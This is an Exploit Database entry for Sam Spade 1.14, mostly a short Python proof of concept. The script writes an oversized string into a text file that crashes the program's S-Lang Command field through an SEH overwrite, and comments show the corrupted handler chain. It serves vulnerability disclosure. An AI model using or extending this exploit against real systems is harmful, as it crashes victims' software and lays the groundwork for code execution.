Sam Spade 1.14 – S-Lang Command Field Overflow (SEH)

• Exploit Database
• 20 阅读

• 作者： Nipun Jaswal
  日期： 2015-11-12
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38687/

• #!/usr/bin/env python
  # Exploit Title : Sam Spade 1.14 S-Lang Command Field SEH Overflow Crash PoC
  # Discovery by: Nipun Jaswal
  # Email : mail@nipunjaswal.info
  # Discovery Date: 12/11/2015
  # Vendor Homepage : http://samspade.org
  # Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
  # Tested Version: 1.14
  # Vulnerability Type: Denial of Service (DoS) Local
  # Tested on OS: Windows XP Professional SP2 x86 es
  # Crash Point : Go to Tools > S-Lang Command> Enter the contents of 'sam_spade_slang_dos.txt' > OK , Note: Do Not Remove the round bracket
  ##########################################################################################
  #-----------------------------------NOTES----------------------------------------------#
  ##########################################################################################
  # And the Stack
  #00FBFE80 41414141AAAA
  #00FBFE84 41414141AAAA
  #00FBFE88 42424242BBBBPointer to next SEH record
  #00FBFE8C 43434343CCCCSE handler
  
  # After the execution of POC, the SEH chain looks like this: 
  #AddressSE handler
  #00FBFE88 43434343
  #42424242 *** CORRUPT ENTRY ***
  
  f = open("sam_spade_slang_dos.txt", "w")
  Junk_a = "A"*528
  nseh= "B" * 4
  seh= "C" *4
  
  f.write(Junk_a+nseh+seh)
  f.close()